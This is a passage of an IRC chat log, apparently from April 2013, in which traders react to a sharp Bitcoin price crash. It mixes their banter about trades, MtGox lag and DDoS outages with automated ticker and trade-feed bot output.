mpexbot needs a better data source Apr 11 00:20:19 i agree. Apr 11 00:21:19 any link to latest communications from BFL regarding delivery - I'm looking to ammuse myself... Apr 11 00:21:29 https://bitcointalk.org/index.php?topic=165500.msg1796232#msg1796232 Apr 11 00:21:31 amuse away Apr 11 00:24:17 https://bitcointalk.org/index.php?topic=171036.msg1795415#msg1795415 Apr 11 00:24:19 also pretty good Apr 11 00:24:29 man... these are some good wads of cash I made Apr 11 00:24:40 mp would it be possible for you to develop relationships directly with your approved exchanged to become a "real" price index? Apr 11 00:24:45 get the info directly Apr 11 00:25:08 exchanges* Apr 11 00:25:20 mircea_popescu: has no approved exchanges Apr 11 00:25:27 it would be possible yes but not desirable. Apr 11 00:25:48 ;;goxlag Apr 11 00:25:48 MtGox lag is 295.600707 seconds. During this time, light travels 0.592380507118 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 11 00:26:03 because you dont want the work/responsibility? Apr 11 00:27:11 because i don't want to be the judge executioner and everything else. Apr 11 00:28:05 makes sense Apr 11 00:28:27 ;;goxlag Apr 11 00:28:27 MtGox lag is 314.06204 seconds. During this time, light travels 0.629376811746 AU. You could have sent a bitcoin from the Sun to Venus (0.72 AU). Apr 11 00:28:37 don't get me wrong, i too would love to be in a better reality. Apr 11 00:28:43 but, this is the on;y one we got. Apr 11 00:29:13 any candidates you think could fill the role if they tried? Apr 11 00:29:27 I nominate Ukto Apr 11 00:29:31 well how would i know. Apr 11 00:29:45 easier to tell once the thing's done and working Apr 11 00:30:31 I humbly decline. Apr 11 00:30:40 I do not like playing Judge. Apr 11 00:30:44 Executioner sure. :P Apr 11 00:30:51 But thats a different story. ;) Apr 11 00:31:13 booo Apr 11 00:32:14 btc e 175 Apr 11 00:32:20 if i had the ability i would Apr 11 00:32:26 way out of my area Apr 11 00:33:05 who runs bitcoinity? Apr 11 00:33:16 comboy Apr 11 00:33:23 lol, watching trollbox on btce Apr 11 00:33:53 I love that Usagi wants to take over the BAKEWELL security Apr 11 00:33:56 jborkl_: wait, btce is up? :P Apr 11 00:34:14 uhh? Apr 11 00:34:30 it is for me Apr 11 00:34:39 it only went down for a minute Apr 11 00:35:56 mp: i love the "the movie-and-a-burger asset" comment... Apr 11 00:36:19 http://www.youtube.com/watch?v=uI4fVgVVpiw Apr 11 00:36:30 a little late with the vid. Apr 11 00:36:35 but yea Apr 11 00:37:49 pgp no but srsly. da people are done complaining about mpex fee Apr 11 00:37:52 now it's the 1 btc Apr 11 00:39:43 ;;goxlag Apr 11 00:39:43 MtGox lag is 107.761137 seconds. During this time, light travels 0.215952111994 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 11 00:39:49 ;;ticker Apr 11 00:39:50 BTCUSD ticker | Best bid: 176.10000, Best ask: 186.90000, Bid-ask spread: 10.80000, Last trade: 186.90000, 24 hour volume: 155464.04726133, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 197.51465 Apr 11 00:41:25 dat spread Apr 11 00:41:28 https://bitcointalk.org/index.php?topic=172596.msg1795924#msg1795924 Apr 11 00:41:34 looky! wolv solved the ddos problem Apr 11 00:42:46 We're taking the night off. We are not accepting new orders tonight (Wednesday Apr 10). Seriously, forget the Bitcoin Charts/Prices. Go for a walk, take a bath, go to the spa. Yes all pending orders will be processed, and Yes we'll be back to normal tomorrow. and no we were NOT hacked. Apr 11 00:42:51 According to canadian bitcoins Apr 11 00:42:53 xD Apr 11 00:43:15 wat Apr 11 00:43:23 lolwut Apr 11 00:44:58 ;;ticker Apr 11 00:44:59 BTCUSD ticker | Best bid: 176.00000, Best ask: 179.98000, Bid-ask spread: 3.98000, Last trade: 170.02999, 24 hour volume: 157519.54743859, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 197.21062 Apr 11 00:45:06 ;;goxlag Apr 11 00:45:08 MtGox lag is 111.797675 seconds. During this time, light travels 0.224041288951 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 11 00:45:23 LOL@WOLV Apr 11 00:45:24 sad that 111s is now respectable Apr 11 00:46:14 yeah...we'll just put UDP traffic from a bunch of hosts into a nice little php/html form and email it back. Apr 11 00:46:42 lucif knows whats up https://bitcointalk.org/index.php?topic=131065.msg1791777#msg1791777 Apr 11 00:46:55 <[yAK]> i was actually getting 300khash by putting a coat hanger into one of the pci express slots Apr 11 00:47:16 lolwut Apr 11 00:47:18 litecoins are strange Apr 11 00:48:15 totally. Apr 11 00:48:31 $160 Apr 11 00:49:38 who'd ever think of using a coat hanger..i should stick a fork in one of my bitcoin mining rigs to see if that helps. Apr 11 00:50:35 http://static6.businessinsider.com/image/5165756a6bb3f7ea1c00000d-803-601/bitcoin-billionaire-2.png Apr 11 00:50:38 Wooh Apr 11 00:53:12 ;;ticker Apr 11 00:53:12 BTCUSD ticker | Best bid: 162.00000, Best ask: 162.01000, Bid-ask spread: 0.01000, Last trade: 162.01000, 24 hour volume: 160814.65103316, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 196.46287 Apr 11 00:54:12 ;;goxlag Apr 11 00:54:16 MtGox lag is 82.196653 seconds. During this time, light travels 0.164721172292 AU. You could have sent a bitcoin ten times between Jupiter and Callisto (0.12567 AU). Apr 11 00:55:52 custom leather products < ahahahah Apr 11 00:55:55 that's too great Apr 11 01:00:49 ;;ticker Apr 11 01:00:50 BTCUSD ticker | Best bid: 152.68000, Best ask: 153.98000, Bid-ask spread: 1.30000, Last trade: 152.68000, 24 hour volume: 164938.44701010, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 195.33394 Apr 11 01:00:59 yeah headed south Apr 11 01:01:03 "@DavidClinchNews: We can laugh at Bitcoin but real guys, in real basements, are losing real fake money right now." Apr 11 01:02:01 lol Apr 11 01:02:07 thats pretty funny Apr 11 01:02:24 im gonna google suicide over loss of btc and see what floats up Apr 11 01:03:00 it appears you guys have blood on your hands already.. Apr 11 01:04:54 lol punkman Apr 11 01:06:09 ;;goxlag Apr 11 01:06:09 MtGox lag is 120.367893 seconds. During this time, light travels 0.241215909866 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 11 01:06:24 lol Apr 11 01:06:32 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [+] Apr 11 01:07:19 [BTCTC] [ASICMINER-PT] 2 @ 0.73 = 1.46 BTC [+] Apr 11 01:07:22 [MPEX] [S.MPOE] 12352 @ 0.00068568 = 8.4695 BTC [-] Apr 11 01:07:24 [MPEX] [S.MPOE] 3748 @ 0.00068433 = 2.5649 BTC [-] Apr 11 01:09:26 the REAL selling session has begin Apr 11 01:09:31 bgun* Apr 11 01:09:35 ... Apr 11 01:10:08 [BTCTC] [ASICMINER-PT] 4 @ 0.73 = 2.92 BTC [+] Apr 11 01:11:06 wtf@ http://leaksource.wordpress.com/2013/04/10/how-the-looming-bitcoin-crash-will-be-exploited-by-globalists-to-outlaw-decentralized-crypto-currencies/ Apr 11 01:12:15 "The velocity of bitcoins is a huge red alert" Apr 11 01:12:31 that's what I'm talking about... Apr 11 01:12:41 this writing sounds a little f'd up Apr 11 01:12:58 doesnt hold water imo Apr 11 01:13:13 time to buy Apr 11 01:13:15 same guy is pestering US government for Area 51 docs Apr 11 01:13:16 132.1 Apr 11 01:13:27 ty bugpowder Apr 11 01:13:36 the oscillation will go up from here Apr 11 01:13:37 i'm telling you, we're back down Apr 11 01:13:53 i don't think it's done yet Apr 11 01:13:56 My asks got filled at 198 Apr 11 01:14:03 my bid at 151 was too high Apr 11 01:14:13 got filled Apr 11 01:14:24 gotta love second chance selling, though... Apr 11 01:14:25 now hoping for 131.1 Apr 11 01:15:03 It does a damped osciallation EVERY TIME. usually the magnitude is too small to trade due to fees, but this one is SO BIG, the fees dont matter. Apr 11 01:15:15 KRS1 the nutsos are moving in Apr 11 01:15:35 Bugpowda classic time arbing Apr 11 01:15:42 filled@ 131.1 Apr 11 01:16:41 [BTCTC] [B.YABMC] 1 @ 0.01249 BTC [+] Apr 11 01:16:45 [BTCTC] [B.YABMC] 1 @ 0.0125 BTC [+] Apr 11 01:16:48 [BTCTC] [B.YABMC] 1 @ 0.013 BTC [+] Apr 11 01:16:53 bp: I agree with theory, but not that we necessarily go back up after attentuation of occillilations... Apr 11 01:16:57 ;;ticker Apr 11 01:16:58 fuck is this, I thought we were back at 200? Apr 11 01:16:58 BTCUSD ticker | Best bid: 129.44000, Best ask: 130.01111, Bid-ask spread: 0.57111, Last trade: 130.01111, 24 hour volume: 173037.17370943, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 192.39910 Apr 11 01:17:05 [BTCTC] [B.YABMC] 1 @ 0.014 BTC [+] Apr 11 01:17:08 [BTCTC] [B.YABMC] 1 @ 0.0175 BTC [+] Apr 11 01:17:12 [BTCTC] [B.YABMC] 2 @ 0.017959 = 0.0359 BTC [+] Apr 11 01:17:14 [BTCTC] [ASICMINER-PT] 15 @ 0.73 = 10.95 BTC [+] Apr 11 01:17:59 its gonna go below 120 Apr 11 01:18:13 its possible Apr 11 01:18:24 I have bids down there too Apr 11 01:18:28 [BTCTC] [B.YABMC] 49 @ 0.017999 = 0.882 BTC [+] Apr 11 01:18:45 ;;goxlag Apr 11 01:18:47 MtGox lag is 189.333507 seconds. During this time, light travels 0.379422228144 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 11 01:18:52 ;;ticker Apr 11 01:18:59 [BTCTC] [PAJKA.BOND] 1 @ 0.1016 BTC [+] Apr 11 01:19:03 Error: Failure to retrieve ticker. Try again later. Apr 11 01:19:06 ;;ticker Apr 11 01:19:07 [BTCTC] [PAJKA.BOND] 1 @ 0.1017 BTC [+] Apr 11 01:19:10 [BTCTC] [PAJKA.BOND] 1 @ 0.1018 BTC [+] Apr 11 01:19:13 [BTCTC] [PAJKA.BOND] 9 @ 0.1019 = 0.9171 BTC [+] Apr 11 01:19:14 BTCUSD ticker | Best bid: 127.21951, Best ask: 129.00000, Bid-ask spread: 1.78049, Last trade: 129.00000, 24 hour volume: 173862.61424907, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 192.07380 Apr 11 01:20:43 ;;bids 100 Apr 11 01:21:00 There are currently 26980.866 bitcoins demanded at or over 100.0 USD, worth 2872092.44501 USD in total. | Data vintage: 46.7765 seconds Apr 11 01:21:09 [BTCTC] [SYNERGY] 4 @ 0.018 = 0.072 BTC [-] Apr 11 01:21:17 [BTCTC] [SYNERGY] 1 @ 0.01996 BTC [+] Apr 11 01:21:30 yeah... the few bitcoins I sold right at the top of the bubble could almost pay for enough bitcoins to settle of my whole BTC-BOND Apr 11 01:21:33 [BTCTC] [SYNERGY] 20 @ 0.024989 = 0.4998 BTC [+] Apr 11 01:21:42 but we ain't seen the bottom of this crash Apr 11 01:21:53 lol now I have to hold for my calls at 194 lolol Apr 11 01:22:11 I executed my calls some time ago... Apr 11 01:22:13 shit could be worse Apr 11 01:22:21 so glad i exercised midday. Apr 11 01:22:29 Everything going superfine here Apr 11 01:22:29 My break even was at 243 24hprc which never came Apr 11 01:22:52 balls, like the 212s, whoops! Apr 11 01:22:53 GOD DAMN GOX Apr 11 01:22:58 the price plummeting is going to help mpoe Apr 11 01:23:02 lagggged Apr 11 01:23:03 !ticker m mpoe Apr 11 01:23:04 The eagle never lost so much time as when he submitted to learn from the crow. Apr 11 01:23:05 my faith is in the chinese tonight. Apr 11 01:23:10 !ticker m s.mpoe Apr 11 01:23:11 [MPEX:S.MPOE] 1D: 0.00068433 / 0.00070689 / 0.000715 (163886 shares, 115.85 BTC), 7D: 0.00063322 / 0.00069025 / 0.00071514 (2061108 shares, 1,422.69 BTC), 30D: 0.00059218 / 0.00068765 / 0.00077505 (9428686 shares, 6,483.68 BTC) Apr 11 01:23:12 hmmmm Apr 11 01:23:18 is anyone selling calls? Apr 11 01:23:22 FILLED another 100BTC. Apr 11 01:23:25 13011. Apr 11 01:23:34 you have 13011 btc? Apr 11 01:23:38 THE FUCK? Apr 11 01:23:40 130.11 Apr 11 01:23:52 ;;ticker Apr 11 01:23:53 BTCUSD ticker | Best bid: 130.00000, Best ask: 130.95306, Bid-ask spread: 0.95306, Last trade: 130.95306, 24 hour volume: 174798.60877076, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 191.69492 Apr 11 01:23:59 http://bitcoinity.org/markets lol at oscar the grouch Apr 11 01:24:07 ;;goxlag Apr 11 01:24:09 MtGox lag is 219.05474 seconds. During this time, light travels 0.438983246301 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 11 01:24:51 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [+] Apr 11 01:24:53 Here comes the bounce bitches. Apr 11 01:25:06 picked up 400 down here Apr 11 01:25:14 NICE Apr 11 01:26:07 sweet Bugpowda Apr 11 01:26:08 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [+] Apr 11 01:26:08 ;;goxlag Apr 11 01:26:11 MtGox lag is 194.482047 seconds. During this time, light travels 0.389739844658 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 11 01:26:18 careful Apr 11 01:26:24 could still touch 120 Apr 11 01:27:15 !GOXLAG Apr 11 01:28:02 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [+] Apr 11 01:28:08 recovering Apr 11 01:28:26 lagging Apr 11 01:28:49 ;;goxlag Apr 11 01:28:53 MtGox lag is 174.694313 seconds. During this time, light travels 0.350085447277 AU. You could have sent a bitcoin from the Sun to Mercury (0.39 AU). Apr 11 01:28:59 wtf gribble Apr 11 01:33:02 ;;ticker Apr 11 01:33:04 BTCUSD ticker | Best bid: 151.11000, Best ask: 160.00534, Bid-ask spread: 8.89534, Last trade: 150.00000, 24 hour volume: 178878.97216569, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 190.19810 Apr 11 01:33:11 BOW DOWN BITCHES Apr 11 01:33:24 fucking love bitcoin Apr 11 01:33:31 haha, awesome Bugpowda Apr 11 01:33:42 ;;seen mircea_popescu Apr 11 01:33:42 mircea_popescu was last seen in #bitcoin-assets 18 minutes and 6 seconds ago: Bugpowda classic time arbing Apr 11 01:33:46 if not for you, I would not have made my calls today. thank u. Apr 11 01:33:52 or exercised them anyhow Apr 11 01:33:58 i do too Apr 11 01:34:06 for trading, volatility is so much fun Apr 11 01:34:16 mircea_popescu: hey do you still have that picture showing the tweets correlating to bitcoin price saying "proof bitcoin isn't a ponzi" Apr 11 01:34:35 OK now to set the exit points Apr 11 01:34:59 volatility is where its at Apr 11 01:35:14 ive been making cash off ltc..up/down daily Apr 11 01:36:10 wow Apr 11 01:36:13 175 Apr 11 01:36:16 [BTCTC] [PAJKA.BOND] 5 @ 0.102 = 0.51 BTC [+] Apr 11 01:36:25 ;;goxlag Apr 11 01:36:26 MtGox lag is 119.363752 seconds. During this time, light travels 0.239203622545 AU. You could have sent a bitcoin between Earth and Venus at their closest approach (0.254 AU). Apr 11 01:37:09 so for the record, In at 133, 121, out at 198, in at 151, 132, 130, 130, out at?? Apr 11 01:37:47 364 Apr 11 01:38:04 177.89 partial fill Apr 11 01:38:42 ;;ticker Apr 11 01:38:42 BTCUSD ticker | Best bid: 170.00000, Best ask: 171.25187, Bid-ask spread: 1.25187, Last trade: 175.00000, 24 hour volume: 179884.35082268, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 188.82739 Apr 11 01:38:51 going back down Apr 11 01:42:08 https://bitcointalk.org/index.php?topic=172009.msg1790293#msg1790293 "people are paying homage to Satoshi by sending him bitcoins.  Bitcoin is now a religion." Apr 11 01:42:57 [BTCTC] [COGNITIVE] 1 @ 0.122 BTC [-] Apr 11 01:44:37 has anyone used bitfinex? Apr 11 01:45:22 why isn't the bot quoting? Apr 11 01:45:24 ;;goxlag Apr 11 01:45:25 MtGox lag is 162.992865 seconds. During this time, light travels 0.326635876501 AU. You could have sent a bitcoin approximately the distance covered by Voyager 1 in one month (0.2988 AU). Apr 11 01:45:34 gribble is trolling Apr 11 01:45:47 thestringpuller: you mean mpex? Apr 11 01:45:51 yessir Apr 11 01:45:54 i have no idea Apr 11 01:45:57 mod6: is the bot qoting with stat? Apr 11 01:45:59 [HAVELOCK] [HIM] 1 @ 1 BTC [-] Apr 11 01:46:18 [BTCTC] [COGNITIVE] 14 @ 0.122 = 1.708 BTC [-] Apr 11 01:46:19 ;;ticker Apr 11 01:46:20 BTCUSD ticker | Best bid: 160.01000, Best ask: 165.00000, Bid-ask spread: 4.99000, Last trade: 160.01000, 24 hour volume: 181176.23438337, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 188.55892 Apr 11 01:46:27 this is absurd Apr 11 01:46:28 i can issue commands to the exachange, buy|sell|stat but the bot has vaporized since the selling began Apr 11 01:46:36 this happened last time there was a large sell off too :/ Apr 11 01:46:42 this is awesome Apr 11 01:46:53 I may have lost money on calls (or not the month still has 19 days left) Apr 11 01:47:01 can i use a bot to trade on public exchanges Apr 11 01:47:01 but man this is BEAUTIFUL Apr 11 01:47:14 cant stand using the web interfaces Apr 11 01:48:45 KRS1: me either. so i wrote unix tools for mpex. much happier :) Apr 11 01:48:54 i bet Apr 11 01:48:56 well, at first I used to do all the orders by hand Apr 11 01:49:00 its been a while since i played with a perl bot Apr 11 01:49:12 mod6 that must have felt like another life to you haha Apr 11 01:49:36 heheh. Apr 11 01:49:50 i'd love to learn how to trade on the mpex and what not..still learning but still have an investment in btc Apr 11 01:49:51 the volatility is at an all time high!!!! Apr 11 01:50:04 Jesus fucking christ Apr 11 01:50:05 [MPEX] [O.USD.C215T] 1 @ 0.2173294 BTC [+] Apr 11 01:50:10 it had certainly been a while since i'd made any perl tools. but i'm glad that i made some now. Apr 11 01:50:19 need to figure out how to buy/sell quickly during times like this Apr 11 01:50:26 the bot is quoting? Apr 11 01:50:26 i love perl Apr 11 01:50:41 i think its because i learned pascal back in 90 Apr 11 01:50:48 how the fuck did that order go through? Apr 11 01:51:13 well, if you have an mpex account, you can certainly use these: https://github.com/modsix/bitotter_perl Apr 11 01:51:22 ah there we go Apr 11 01:51:24 i <3 perl too, python can suck my ass Apr 11 01:51:28 haha yeah Apr 11 01:51:32 im with you bro Apr 11 01:51:35 :] Apr 11 01:51:42 and thank you very much for writing that Apr 11 01:51:55 [HAVELOCK] [HIM] 1 @ 1 BTC [-] Apr 11 01:52:18 ;;ticker Apr 11 01:52:18 no worries. hope it'll help someone out if uses it. let me know if you need help or whatever. Apr 11 01:52:18 BTCUSD ticker | Best bid: 150.50000, Best ask: 157.49999, Bid-ask spread: 6.99999, Last trade: 157.50000, 24 hour volume: 181970.84476366, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 188.03489 Apr 11 01:52:29 we're in #BitOTTer also Apr 11 01:52:39 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [+] Apr 11 01:53:16 k thx Apr 11 01:53:47 ;;bids 0 Apr 11 01:53:47 There are currently 42473977 bitcoins demanded at or over 0.0 USD, worth 9588602.81013 USD in total. | Data vintage: 65.6944 seconds Apr 11 01:54:54 the bulls are waking up Apr 11 01:56:09 i was asking about bitfinex just cause this guy in -otc mentioned it to me since i called Gox a jackwagon Apr 11 01:56:25 i went to the website, but it seems that it's all sort of behind the scenes and what not Apr 11 01:56:56 [HAVELOCK] [HIM] 2 @ 0.85 = 1.7 BTC [-] Apr 11 01:58:30 i guess they have leverage there ... hmm. scary. Apr 11 01:58:38 sounds like another icbit Apr 11 01:58:56 [HAVELOCK] [HIM] 2 @ 0.85 = 1.7 BTC [-] Apr 11 01:58:56 icbit is down right? Apr 11 01:59:02 ;;ticker Apr 11 01:59:03 BTCUSD ticker | Best bid: 142.00000, Best ask: 143.00000, Bid-ask spread: 1.00000, Last trade: 142.00000, 24 hour volume: 181056.34284909, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 187.38060 Apr 11 01:59:25 thestringpuller: no clue, i've never used it. Apr 11 01:59:40 is *everyone* ddossed right now? Apr 11 02:00:11 yessir Apr 11 02:00:14 seems to be a lot of attacks being reported Apr 11 02:00:15 benkay_: yep seems like someone used "*" in their botnet console Apr 11 02:00:24 XD Apr 11 02:00:55 i want a botnet Apr 11 02:00:58 mircea_popescu: what happened to the mpoe bot? Apr 11 02:01:36 just unplugged until a bottom is reached? Apr 11 02:01:54 It relies on bitcoincharts for 24hr vwap Apr 11 02:01:54 $avg Apr 11 02:01:56 ThickAsThieves: An error has occurred and has been logged. Please contact this bot's administrator for more information. Apr 11 02:02:02 ;;bc,24hprc Apr 11 02:02:03 Error: Failed to retrieve data. Try again later. Apr 11 02:02:10 No feed, no vwap, no bot quotes Apr 11 02:02:25 ok. Apr 11 02:02:59 [HAVELOCK] [HIM] 4 @ 1 = 4 BTC [+] Apr 11 02:03:46 ;;goxlag Apr 11 02:03:46 MtGox lag is 39.813814 seconds. During this time, light travels 0.0797864374783 AU. You could have sent a bitcoin ten times between Saturn and Titan (0.0802 AU). Apr 11 02:03:55 as depressing as it is Apr 11 02:03:56 [HAVELOCK] [VTX] 2 @ 0.26 = 0.52 BTC [+] Apr 11 02:03:59 that's a reassuring number. Apr 11 02:04:55 [HAVELOCK] [VTX] 1 @ 0.2785 BTC [+] Apr 11 02:05:19 :) Apr 11 02:07:59 ok well no wonder it goes down every time Apr 11 02:08:03 [HAVELOCK] [VTX] 2 @ 0.275 = 0.55 BTC [-] Apr 11 02:08:08 everytime that gox shits its pants, so does bitcoincharts Apr 11 02:08:36 astonishing that nobody caches this data Apr 11 02:09:01 it's astonishing that the price is still volatile after the sell off hours ago Apr 11 02:09:15 many didnt have a chance to sell off earlier Apr 11 02:09:24 a traditional market would have shut off completely Apr 11 02:09:50 VWAP is still in the 180's Apr 11 02:09:52 i know wall st does that, but do currency exchanges do that? Apr 11 02:10:38 what's the rationale behind that? Apr 11 02:10:45 holding trading, that is Apr 11 02:10:58 move beyond market participants panic state? Apr 11 02:11:12 benkay Apr 11 02:11:47 thestringpuller: icbit has been up throughout the day, no downtime noted Apr 11 02:11:55 [HAVELOCK] [KCIM] 1 @ 1.15 BTC [+] Apr 11 02:12:34 !ticker h KCIM Apr 11 02:12:36 [HAVELOCK:KCIM] 1D: 0.99520001 / 1.03657501 / 1.15000000 (16 shares, 16.58520009 BTC), 7D: 0.99520001 / 1.12171273 / 1.20900000 (55 shares, 61.69420011 BTC), 30D: 0.99500000 / 1.13147209 / 1.39999000 (205 shares, 231.95177822 BTC) Apr 11 02:12:40 gonna be traveling for the next week or so. any inquiries PM me on the forums or send a support request via btct.co. Apr 11 02:15:51 mod6 if bitcoincharts is retarded bot can't quote. Apr 11 02:16:00 i've not unplugged anything. Apr 11 02:16:48 gotcha. Apr 11 02:17:59 What are people using as gox alternatives? Apr 11 02:18:37 there's campbx Apr 11 02:18:45 i'm trying them out Apr 11 02:19:30 thx Apr 11 02:22:52 ;;ticker Apr 11 02:22:54 BTCUSD ticker | Best bid: 151.26402, Best ask: 152.00000, Bid-ask spread: 0.73598, Last trade: 152.00000, 24 hour volume: 182131.60623678, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 186.21706 Apr 11 02:24:25 so many of these gox trades are silly little bot amount Apr 11 02:24:25 s Apr 11 02:25:26 benkay_: wow, that's weak. It allowed me to create a non-alphanumeric username but won't allow me to log in with it. :/ Apr 11 02:25:44 bitfloor Apr 11 02:26:42 MJR_: thanks Apr 11 02:26:57 lol securitah Apr 11 02:28:55 [HAVELOCK] [VTX] 3 @ 0.275 = 0.825 BTC [-] Apr 11 02:35:25 http://www.dailymail.co.uk/news/article-2238577/Maria-Santos-Gorrostieta-executed-surviving-assassination-attempts.html Apr 11 02:35:28 so they finally got her. Apr 11 02:38:13 wow. Apr 11 02:42:08 mircea_popescu: that's the kind of thing I mean by "X can also have problems." Apr 11 02:43:05 huh Apr 11 02:43:07 ya, shooting rural women mayors, very impressive. Apr 11 02:43:12 she had some drama in her life Apr 11 02:43:21 but sad story anyway Apr 11 02:44:16 [MPEX] [O.USD.C167T] 1 @ 0.3 BTC [+] Apr 11 02:44:40 $avg Apr 11 02:44:42 ThickAsThieves: 189.06 Apr 11 02:45:31 thank dog, the mpoe bot is back Apr 11 02:45:41 i finally got socket.io to work with java Apr 11 02:45:47 i am the happiest guy in the world Apr 11 02:45:56 unfortunately, i can't get it to work over ssl Apr 11 02:45:56 o hey, bitcoincharts livesd Apr 11 02:46:07 ;;goxlag Apr 11 02:46:09 MtGox lag is 2.21016 seconds. During this time, light travels 0.00442913589382 AU. You could have sent a bitcoin from Jupiter to its third largest moon, Io (0.002819 AU). Apr 11 02:46:35 oh hey, mpexbot lives too Apr 11 02:47:09 they're related Apr 11 02:47:11 ;;bc,24hprc Apr 11 02:47:12 189.06 Apr 11 02:47:33 yeah, but sometimes bitcoincharts is "kinda" up and mpexbot doesn't place orders Apr 11 02:48:25 well it has to get an answer when it asks sorta thing Apr 11 02:48:44 how often does it retry if it fails to get a response? Apr 11 02:49:07 ;;goxlag Apr 11 02:49:11 MtGox lag is 20.926272 seconds. During this time, light travels 0.0419360147858 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 11 02:50:08 sorry, mpexbot is what controls gribble? is gribble getting its numbers from bitcoincharts? Apr 11 02:50:09 well often-ish, but trying to also not kill the service Apr 11 02:50:12 balancing act. Apr 11 02:50:30 gesell the 24hprc is from bitcoincharts yesd Apr 11 02:50:38 aaah yeah Apr 11 02:52:05 look like they're only returning EUR and USD for currencies now, maybe that'll ease their load: http://bitcoincharts.com/markets/currencies/ Apr 11 02:52:20 ;;ticker --currency cad Apr 11 02:52:24 BTCCAD ticker | Best bid: 158.41987, Best ask: 165.39963, Bid-ask spread: 6.97976, Last trade: 163.21575, 24 hour volume: 701.68925062, 24 hour low: 106.20810, 24 hour high: 270.77398, 24 hour vwap: 198.09981 Apr 11 02:52:32 ;;ticker Apr 11 02:52:33 BTCUSD ticker | Best bid: 155.10300, Best ask: 155.99999, Bid-ask spread: 0.89699, Last trade: 156.00000, 24 hour volume: 188103.95597068, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 185.00224 Apr 11 02:54:49 , 24 hour low: 105.00000, 24 hour high: 266.00000, Apr 11 02:54:50 epic. Apr 11 02:55:26 so people who bought calls got burned this time Apr 11 02:56:41 it'd depend what calls they bought. Apr 11 02:56:45 month started around 90. Apr 11 02:57:08 mhm Apr 11 02:57:20 https://bitcointalk.org/index.php?topic=172471.0 this is fulla win. usagi is taking over something or the other. Apr 11 03:01:11 [MPEX] [S.MPOE] 13100 @ 0.00070833 = 9.2791 BTC [+] Apr 11 03:02:11 it is so funny how expectations change the story Apr 11 03:02:14 sad really Apr 11 03:02:18 when we were at 80 Apr 11 03:02:29 i think 2 weeks ago? Apr 11 03:02:39 people would have been thrilled to hear we would be at 160 Apr 11 03:02:55 but once you've hit 265 for no reason at all...now 160 isn't good? Apr 11 03:03:01 haha. true MJR_ Apr 11 03:03:07 ;;estimate Apr 11 03:03:07 Next difficulty estimate | 9136646.06287 based on data since last change | 9622630.79435 based on data for last three days Apr 11 03:03:15 ! Apr 11 03:03:23 ;;nethash Apr 11 03:03:24 68882.525336 Apr 11 03:07:23 people call me Apr 11 03:07:26 say "omg crash" Apr 11 03:07:47 i blink and say "srsly? you care about one day's movement?" Apr 11 03:08:47 call me if we're ever down week over week; whichever cryptocurrency is popular at the time might actually have hit a steady-state value at that point Apr 11 03:08:57 looks like we have some healthy support at 160, http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Apr 11 03:10:54 benkay_ for every person that matters there's 1k+ people with a btc or less. Apr 11 03:11:11 for every person with 1 btc or less there's 1k+ people with a bunch of social media accounts. Apr 11 03:11:19 the resulting noise from all this amplification... Apr 11 03:11:26 that graph looks like the price will drop Apr 11 03:11:30 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Apr 11 03:11:33 [BTCTC] [ASICMINER-PT] 1 @ 0.719 BTC [-] Apr 11 03:11:47 isn't that the future of the currency distribution anyways? lots of people holding tiny amounts? Apr 11 03:11:51 mircea_popescu? Apr 11 03:11:56 will the network keep up? Apr 11 03:12:00 well the cream rises to the top Apr 11 03:12:02 probably. Apr 11 03:12:10 we are the 1% Apr 11 03:12:15 occupy -assets Apr 11 03:12:15 im always worried about the network unable to facilitate transactions Apr 11 03:12:16 .001 hopefully Apr 11 03:12:22 but the thing is, to 99.99% of people "involved, their involvement is just saying the name Apr 11 03:12:23 bitcoin Apr 11 03:12:36 for 99% of people involved, their involvement is less than a decent meal. Apr 11 03:12:42 ;;ticker Apr 11 03:12:43 BTCUSD ticker | Best bid: 167.00000, Best ask: 167.01000, Bid-ask spread: 0.01000, Last trade: 167.00000, 24 hour volume: 190512.24561499, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 184.31487 Apr 11 03:12:53 they need to say the name 3 times in a dark room into a mirror Apr 11 03:13:02 this somehow is disproportionate to the attention, almost as if the less skin in the game, the more theorizing etc. Apr 11 03:13:06 i've tried that..bitcoins from heaven does not come Apr 11 03:13:09 http://www.reddit.com/r/Bitcoin/comments/1c2u1x/operation_foolscoin/ Apr 11 03:13:19 i cant even begin to count all the coins i sold for dimes Apr 11 03:13:28 i would have been able to retire Apr 11 03:13:58 that support at 160 is probly price manip Apr 11 03:14:05 1 big wal Apr 11 03:14:06 l Apr 11 03:14:41 maybe Apr 11 03:14:48 i think they accomplished their goal already Apr 11 03:14:52 they got coins cheap Apr 11 03:15:11 by the way, did anyone see CNBC "MARKET WATCH: Bitcoin Bubble Burst?" Apr 11 03:15:21 like its 